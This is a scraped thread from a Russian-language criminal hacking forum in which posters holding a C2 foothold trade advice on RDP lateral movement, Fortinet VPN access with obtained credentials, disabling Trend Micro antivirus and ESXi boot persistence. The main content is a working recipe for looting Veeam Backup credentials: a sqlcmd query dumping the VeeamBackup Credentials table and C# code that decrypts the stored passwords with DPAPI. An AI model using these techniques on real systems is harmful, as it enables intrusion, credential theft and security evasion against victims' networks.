Парни помогите с задачей, с прайм призм нутаникса как поменять пассы в кластерах чтоб попасть в cli
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[net-hacking] Вопросы по сетям
- Автор темы iron
- Дата начала
-
- Теги
- network-hacking
Всем привет, помогите советом плз.
Ситуация следующая. Есть контроль над машиной 1. С2 хавок, UAC / admin права , сессия.
С 1ой машины есть коннект через rdp/mstsc к машине 2. Есть креды от рдп ведущего к пк 2 - administrator и пароль. При попытке подключиться с левой машины - вижу что креды верные , получаю сертификат и .. ошибка *your remote administator might end the connection* . Может это NLA , может сессия вечно активна того юзера, несмотря на то что он оффлайн/выключен пк. Неясный момент. Пробовал с разных пк , ос.
Рдп порт нестандартный. Тестировал в своей сети подобную связку. С помощью sharprdp и всяких форков (для с2 в том числе ) (https://github.com/0xthirteen/SharpRDP/compare/master...JamesCooteUK:SharpRDP:keep-alive ) могу открыть на нужном пк в цепочке максимум калькулятор , иные сложные команды по типу смд /c , powershell -ecn или -сommand не получается выполнить (висит окно run в итоге или powershell окно с кривым синтаксисом ' " ломают всё).
c https://github.com/kost/rdpcmd - еще интереснее, порой начинает печатать команду в бразуер открытый и тд..
всё делаю из под демона хавока
гляжу в сторону rdp proxychain, psexec,smbexec,robocopy, pyrdp, evilrdp. Есть безумный план. Сделать юзера-админа на машине 1. залететь туда по рдп - попробовать залететь на номер 2 через дабл рдп и быстренько подцепить (так можно, я проверил ) - но это жестко и как финальный шаг.
Может кто сталкивался с подобным? Как попасть на машину номер 2?
Ситуация следующая. Есть контроль над машиной 1. С2 хавок, UAC / admin права , сессия.
С 1ой машины есть коннект через rdp/mstsc к машине 2. Есть креды от рдп ведущего к пк 2 - administrator и пароль. При попытке подключиться с левой машины - вижу что креды верные , получаю сертификат и .. ошибка *your remote administator might end the connection* . Может это NLA , может сессия вечно активна того юзера, несмотря на то что он оффлайн/выключен пк. Неясный момент. Пробовал с разных пк , ос.
Рдп порт нестандартный. Тестировал в своей сети подобную связку. С помощью sharprdp и всяких форков (для с2 в том числе ) (https://github.com/0xthirteen/SharpRDP/compare/master...JamesCooteUK:SharpRDP:keep-alive ) могу открыть на нужном пк в цепочке максимум калькулятор , иные сложные команды по типу смд /c , powershell -ecn или -сommand не получается выполнить (висит окно run в итоге или powershell окно с кривым синтаксисом ' " ломают всё).
c https://github.com/kost/rdpcmd - еще интереснее, порой начинает печатать команду в бразуер открытый и тд..
всё делаю из под демона хавока
гляжу в сторону rdp proxychain, psexec,smbexec,robocopy, pyrdp, evilrdp. Есть безумный план. Сделать юзера-админа на машине 1. залететь туда по рдп - попробовать залететь на номер 2 через дабл рдп и быстренько подцепить (так можно, я проверил ) - но это жестко и как финальный шаг.
Может кто сталкивался с подобным? Как попасть на машину номер 2?
Последнее редактирование:
Upd . Кажется разобрался. Ну и возможно кому будет полезна инфа
Решение = mobaxterm + pc 1 как ssh jump хост.
Решение = mobaxterm + pc 1 как ssh jump хост.
есть ли хоть какая-нибудь возможность подключиться, если есть креды от локал пользователя? По rdp доступ не дает, так как нет прав, а smb порт закрыт
Последнее редактирование:
все что в datastore не удаляеться
также в esxi есть файл /etc/rc.local.d/local.sh, который выполняется при каждой загрузке системы. туда можно прописать все что надо запустить при старте ...
а что с есками от 7 версии делать?
Привет!
Я работал с ShadowRDP, вот статья по этой теме (https://red.c3r3br4t3.com/red-team-operations/lateral-movement/shadowrdp), так же если не будет получаться как у автора, он привел другие статьи, возможно от туда что-то поможет.
Кто подскажет по декрипту виима, кроме павершелл скрипта. ПШ скрипт коннектится к базе, но не декриптит бывают ситуации. Пишет exit
Found Veeam DB on \@, connecting...
Can't connect to DB, exit.
Found Veeam DB on \@, connecting...
Can't connect to DB, exit.
Последнее редактирование:
берешь серв где у тебя виам. снимаешь такслист
ищешь PID от sqlservr.exe
потом с этого же серва снимаешь netstat -ano и ишешь порт по пиду sqlservr.ехе
Пример вывода
пид 1328
порт 49679
Ищешь порт MsSQL по PID в 2-х выводах
ищешь где лежит sqlcmd.exe
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,найденный_порт -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
или
-
опция -y0 обязательно иначе sqlcmd режет вывод
+++
=====
дальше берёшь вот такой код и создаешь файл veeam.cs
на каждый хэш отдельный вызов функции Decrypt
файл что создали с кодом выше, кладем в папку, и вызываем:
сообираешь c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe veeam.cs
полученный exe закидываешь на сервер с veeam и запускаешь
@Dropbear
Код:
tasklist /vищешь PID от sqlservr.exe
Код:
netstat -anoпотом с этого же серва снимаешь netstat -ano и ишешь порт по пиду sqlservr.ехе
Пример вывода
Код:
sqlservr.exe 1328 Services 0 1,016,020 K
1328
--
вбивиаем в нетсате -ано
TCP 0.0.0.0:49679 0.0.0.0:0 LISTENING 1328пид 1328
порт 49679
Ищешь порт MsSQL по PID в 2-х выводах
ищешь где лежит sqlcmd.exe
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,найденный_порт -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
или
Код:
sqlcmd -S localhost,найденный_порт -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"опция -y0 обязательно иначе sqlcmd режет вывод
+++
=====
дальше берёшь вот такой код и создаешь файл veeam.cs
C#:
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
namespace Main
{
internal static class Program
{
private static void Decrypt(string b,string a){
if (string.IsNullOrEmpty(a))
{
return;
}
byte[] encryptedData = Convert.FromBase64String(a);
Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine)));
return;
}
private static void Main(string[] args)
{
Decrypt("необязательный юзернейм","тут хэш из вывода sqlcmd");
}
}
}на каждый хэш отдельный вызов функции Decrypt
файл что создали с кодом выше, кладем в папку, и вызываем:
сообираешь c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe veeam.cs
полученный exe закидываешь на сервер с veeam и запускаешь
@Dropbear
ты крутой
tdskiller умеет убивать ав? как так? там же дажде нет функционала. он тупо сканит на зловредов
Знает кто-нибудь каким софтом можно снять trend micro?
да с ребутом компа убивает, если дает запустить. там команды нужно запустить с процессами авера и он их как вирус блочит
три команды с одними и теми же процессами?
Помогите подключиться к фортику. Креды от веб панели валидные, скачиваю клиент
Тоже все окей.
sudo openconnect --user=admin --protocol=fortinet https://host:port/ ввожу
Пишет
Server certificate verify failed: certificate does not match hostname
Got HTTP response: HTTP/1.1 405 Method Not Allowed
Unexpected 405 result from server
Invalid credentials; try again.
Я так понял надо получить серт и добавить его через опцию?
--servercert
Тоже все окей.
sudo openconnect --user=admin --protocol=fortinet https://host:port/ ввожу
Пишет
Server certificate verify failed: certificate does not match hostname
Got HTTP response: HTTP/1.1 405 Method Not Allowed
Unexpected 405 result from server
Invalid credentials; try again.
Я так понял надо получить серт и добавить его через опцию?
--servercert
Вложения
По всей видимости вход по внутреннему серту
Всем привет. Вопрос по фортикам. Подскажите пожалуйста, возможно ли подключиться через клиент, если креды подходят к данный форме в бебке, и вообще для чего она нужна?
Тут не схожая ситуация с cisco vpn, где креды одни и те же, и после успешного входа в веб панель, предлагается скачать клиент anyconnect? Также если нет мультифакторки, то в большей степени доменные креды могут подойти для подключения, конечно если пользователь состоит в нужной группе?
Тут не схожая ситуация с cisco vpn, где креды одни и те же, и после успешного входа в веб панель, предлагается скачать клиент anyconnect? Также если нет мультифакторки, то в большей степени доменные креды могут подойти для подключения, конечно если пользователь состоит в нужной группе?
Очень много зависит от конфигурации конкретного юзера и его разрешений
LDAP в фортинет не используется по умолчанию для подключения к впн, ты делаешь кокретных локальных юзеров для ВПН, подойдут ли креды доменные зависит исключительно от человеческого фактора
Твоей командой он сам тебе плюнет в логе серт нужный и предложит принять его. Сертификат не причем
У тебя проблема в юзере